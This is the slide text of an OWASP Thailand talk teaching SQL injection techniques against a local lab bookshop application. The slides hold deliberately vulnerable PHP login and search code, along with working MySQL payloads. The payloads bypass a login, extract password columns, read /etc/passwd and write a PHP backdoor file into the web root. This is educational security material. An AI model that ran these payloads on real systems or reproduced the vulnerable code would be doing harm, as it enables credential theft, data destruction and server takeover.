Topic: SQL Injection 101 : It is not just about ' or '1'='1 Speaker: Pichaya Morimoto Event: OWASP Thailand Meeting 3/2014 Date: Auguest 28, 2014

1. SQL Injection 101
It is not just about ' or '1'='1
pichaya@ieee.org
fb.com/index.htmli
linkedin.com/in/pich4ya
Pichaya Morimoto

2. Legal Warning
พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐
มาตรา 5
ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ
พาะและมาตรการนั้นมิได้มีไว้สำหรับตน
โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท
มาตรา 7
ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ
พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน
โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท
มาตรา 9
ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ
บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ
โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท

3. Overview
★ Anatomy of SQL Injection Attack
★ Injection Techniques
○ B-E-T-U-S
★ Privilege Escalation
○ File & RCE
★ Advanced Attacks
★ Case Studies

4. What is SQL Injection
“A SQL injection attack consists
of insertion or "injection" of a
SQL query via the input data from
the client to the application.”
- https://www.owasp.org/index.php/SQL_Injection
Web
Application
User inject a specially
crafted SQL as input to
manipulate results
Application Users
via client programs
Input Entry Points
(Search box, Forms, Article ID,
Session ID, HTTP headers etc.)
Database

5. Very Popular among Hackers

6. Impact on SQL Injection
In general, consider SQL Injection a high impact severity.
Technical Impacts Business Impacts
★ Data losses
★ Bypass Authentications
★ Denial of access
★ Lead to host takeover
★ All data could be stolen,
modified, or deleted.
★ Could your reputation be
harmed?
* https://www.owasp.org/index.php/Top_10_2013-A1-Injection
* https://www.owasp.org/index.php/SQL_Injection

7. Exploitation Complexity
95% 4% 1%
Very Hard Lunatic
Easy (Required
an Expert)
(Maze queries, 2nd order,
Blind, Complex App Logic,
Bypass Filters/WAF etc.)
SQL injection with Havij by 3 year old

8. A Ton of Tools
★ Automated SQL injection Tools
SQLMap, Havij, BBQSQL, SQLNinja, SQLiX,
BobCat, bSQLHacker, bSQLbf, Absinthe,
SQLBrute, Squeeza, SQL Power Injector etc.
★ Web Vulnerability Scanner
○ Commercial
Acunetix, Netsparker, IBM AppScan,HP Fortify,
HP WebInspect, BurpSuite Pro, Qualys WAS etc.
○ Free
W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.

9. Tool == Super Easy ?

10. Tool == Super Easy ?

11. Tools there, why learn to SQLi?
1. When tools failed to exploit?
2. False Positive
★ Complex Database Query
★ Complex Application Logic
★ Encodings & Blacklist Filters
★ Post Authen-ed
★ Anti-CSRF Token
★ Non-SELECT statements
★ Programmer is so indy
3. It’s just fun, and sometimes can make good money...
In case you are penetration tester, or just a Zero-day hunter ;)
Popular websites already scanned by those available tools.
It is very challenge, if you can find flaws that overlooked by tools.

12. Quote from a Hacker
“แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่
แฮกเว็บได้ 1,000 เว็บ แต่เป็น
แฮกเกอร์ที่แฮกเว็บเดิมได้
1,000 ครั้ง โดยที่โดน
แพทช์ไปแล้วทุกครั้ง”
ตาเล็ก Windows98SE

13. SQL Injection Techniques
1. Boolean-based blind
2. Error-based
3. Time-based blind
4. UNION query-based
5. Stacked queries

14. Boolean-based blind technique
★ Inject SQL string to control result to be
TRUE or FALSE using boolean algebra
★ You can determine whether T/F based on
analysis of HTTP responses
(string/regex/page length/HTTP status)
★ Retrieve arbitrary data:
○ Sub-Queries with “SELECT” +
Conditions (CASE-WHEN, IF-THEN)

15. Example of Vulnerable Code
User Input
TITLE
insert into
SQL query
TRUE case : title = naruto FALSE case : title = abc123

16. Boolean-based blind : Probe
★ title = naruto
SQL : SELECT * FROM bookshop WHERE title='naruto'
Result : found (TRUE)
★ title = abc123
SQL : SELECT * FROM bookshop WHERE title='abc123'
Result : not found (FALSE)
★ title = naruto' and '1'='1
SQL : ..WHERE title='naruto' and '1'='1'
Result : found (TRUE)
★ title = naruto' and 1=2-- -
SQL : ..WHERE title='naruto' and 1=2-- -'
Result : found (FALSE)
Insert another
TRUE condition
connected with
‘AND’
operator
MySQL
comments
-- -
#
/**/
T & T = T
T & F = F

17. Boolean-based blind : Exploit
★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- -
Result: found (TRUE)
★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- -
Result: not found (FALSE)
★ title=naruto' and 'cat'=
(if(database()='owasp_db','cat','dog'))-- -
Result: found (TRUE)
★ title=naruto' and 'cat'=
(if(mid(database(),1,1)='a','cat','dog'))-- -
Result: not found (not starts with ‘a’) … b … c ...
★ title=naruto' and 'cat'=
(if(mid(database(),1,1)='o','cat','dog'))-- -
MySQL IF function
IF(
<condition>,
<return when TRUE>,
<return when FALSE>
)
MySQL substring
functions
1. SUBSTRING
(str, pos, len)
2. SUBSTR
(str, pos, len)
3. MID(str, pos, len)
Result: found (starts with ‘o’), then go to next character.

18. Example of Vulnerable Code
$email=$_POST['email'];
$password=$_POST['password'];
$sql="SELECT * FROM users WHERE (email='$email')";
$sql.=" AND (password='$password')";
$result = mysql_query($sql);
if(mysql_num_rows($result)){
die(header('location: member.php'));
}else{
die(header('HTTP/1.0 401 Unauthorized'));
}
True (Login successful)
HTTP/1.1 302 Found
location: member.php
False (Login failed)
HTTP/1.0 401
Unauthorized
Unvalidated
User Input
Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1"
… WHERE (email='a') AND (password='')||(2>'1')
Always TRUE

19. Boolean-based blind : Exploit
password=1' or
2>(if(mid((select password from users),1,1)='a',1,3))-- -
HTTP/1.0 401 Unauthorized
Char Pos : 1
password=1' or
from first record of password column
2>(if(mid((select password from users),1,1)='b',1,3))-- -
HTTP/1.0 401 Unauthorized
...
password=1' or
2>(if(mid((select password from users),1,1)='t',1,3))-- -
HTTP/1.1 302 Found
location: member.php
If Char Pos 1 equals to ‘a’ then
return 1, otherwise return 3
When result is in TRUE case
that means 1st char is current value ( ‘t’ )

20. Boolean-based blind : Exploit
password=1' or
2>(if(mid((select password from users),2,1)='a',1,3))-- -
HTTP/1.0 401 Unauthorized
Go To
next
Repeat steps until you character
get all text from the
results!
Tip: Find length(<query>)

21. Boolean-based blind : Exploit
Look for automate way ? if the flaw is not too
complicate then we can just switch to SQLMap.
But keep in mind, there are A LOT of tricky
patterns that tools cannot figure out how to evaluate
as TRUE or FALSE, so just write your own script!
Faster blind test algorithms:
★ Bisection algorithm (binary search)
★ Bit-shift algorithm
★ Regular Expression search

22. Error-based : Concept
★ Inject specially crafted invalid SQL syntax
★ Ideally, force web application to expose
Error Message which contains
the injection results
★ Methods depend solely on DBMS
★ Rarely found in production webapps

23. Example of Vulnerable Code
function search_book($title){
global $con;
$sql = "SELECT * FROM bookshop WHERE title='".$title."'";
$result = mysql_query($sql) or die(mysql_error($con));
if(mysql_num_rows($result)){
return 'found';
}else{
return 'not found';
}
Show Database Error
Message when query
result in an error
}
$book_title = $_GET['title'];
$book_status = search_book($book_title);
echo '<h1>Result: '.$book_status.'</h1>';

24. Error-based : Exploit
http://url/searchbook.php?title='
and extractvalue(rand(),
concat(0x3a,
(select concat(user(),database()))
))-- -

25. Error-based : Exploit
http://url/searchbook.php?title='
and extractvalue(rand(),
concat(0x3a,
(select concat_ws(0x3a,email,password)
from users limit 2,1)
))-- -
Caution
Error messages
has limit number
of allowed length,
so what?
length() + mid() ;)

26. Time-based blind : Concept
★ Inject valid SQL string to
○ wait for few seconds in TRUE
conditions and …
○ longer/shorter delay for FALSE
★ Analysis on response time to determine
the result of queries
★ Take long time to get result but very
useful to hack completely blind flaws

27. Example of Vulnerable Code

28. Time-based blind : Exploit
newbook.php?title=aaa&author=bbb'+
if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+-
SQL: INSERT INTO bookshop(title,author) values
('aaa','bbb'+if(ord(mid((select version()),12,1))
>108,sleep(5),sleep(10)))-- -')
TRUE case : sleep(5) , delay 5 seconds
FALSE case : sleep(10), delay 10 seconds
Delay 5 seconds

29. Time-based blind : Exploit
Write a script to automate the attack !
For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py

30. Time-based blind : Exploit
sleep()
executed !

31. UNION query-based : Concept
★ Most popular method found in SQL
injection tutorials from Google/YouTube
★ Inject valid SQL string by making the
left-side SELECT to be false and then
insert “UNION” with another right-side
SELECT query using same number of
columns contain what you want to fetch.

32. Example of Vulnerable Code
Unvalidated parameter ‘author’
pass into SQL query

33. UNION query-based : Exploit
Step 1 : Find columns of left SELECT statement using ‘ORDER BY’
http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- -
There are column no. 1 - 4 in
underlying SELECT query
There is no 5th
column. If db error
msg on, u will see:
Unknown column '5' in
'order clause'

34. UNION query-based : Exploit
Step 2.1 : We do not need result from 1st SELECT SQL query so
discard it with ‘always FALSE’ condition.
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- -
Step 2.2 : Insert 2nd SELECT SQL query separated by UNION
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2
UNION select 1,2,3,4-- -
Result of
“SELECT
1,2,3,4” will
replace where
the result of 1st
SELECT was.

35. UNION query-based : Exploit
Exploit : http://owasp-sqli.
local/showbook.php
?author=longcat' and 1>2 union
select user(),database(),version(),
(select group_concat(email,
password) from users)--+-
Tips: Database Meta Data
select database()
select table_name from
information_schema.tables
select column_name from
information_schema.columns

36. Stacked Queries : Concept
★ Append another query into the injection
★ Not All DBMS drivers/API support
stacked queries
★ Very Effective for MS-SQL, SQLite
Attack Scenario:
User Input = 123
SQL: SELECT email FROM users where id=123
User Input = 456; DROP table users
SQL: ... users where id=456; DROP table users

37. Example of Vulnerable Code

38. Stacked queries : Exploit

39. Privilege Escalation
★ Read credential from configuration files
★ Create Accessible Web Backdoor
★ Arbitrary OS command execution

40. SQL Injection : Read File
Exploit: http://owasp-sqli.local/showbook.php
?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-

41. SQL Injection : Write File
Exploit: http://owasp-sqli.local/showbook.php
?author=longcat' and 1>2 union select
0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile
'/var/www/owasp-sqli.local/public_html/upload/info.php'--+-

42. SQL Injection : OS CMD Shell
1. Write File > Web Backdoor
( ex. http://youtube.com/watch?v=QIXTPPBfLyI )
2. Built-in OS command functions / UDF
MS-SQL xp_cmdshell

43. Advanced Attacks
★ MySQL Second Order SQL Injection
★ Abusing PHP PDO prepared statements
★ Making a Backdoor with SQLite
★ How a hashed string causes SQL Injection flaw
★ Account Takeover with SQL Truncation Attack
★ CodeIgniter Active Record Bypass

44. Next Time :s

45. Thanks! Need More?
Good Resources
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
https://www.owasp.org/index.php/Blind_SQL_Injection
http://websec.ca/kb/sql_injection
https://github.com/sqlmapproject/sqlmap
http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633
Build your own SQL Injection Playground
https://github.com/SpiderLabs/MCIR/tree/master/sqlol
https://github.com/Audi-1/sqli-labs
https://github.com/sqlmapproject/testenv
https://www.owasp.org/index.
php/OWASP_Broken_Web_Applications_Project
https://pentesterlab.com/exercises/web_for_pentester/
https://pentesterlab.com/exercises/from_sqli_to_shell_II/
https://pentesterlab.
com/exercises/from_sqli_to_shell_pg_edition/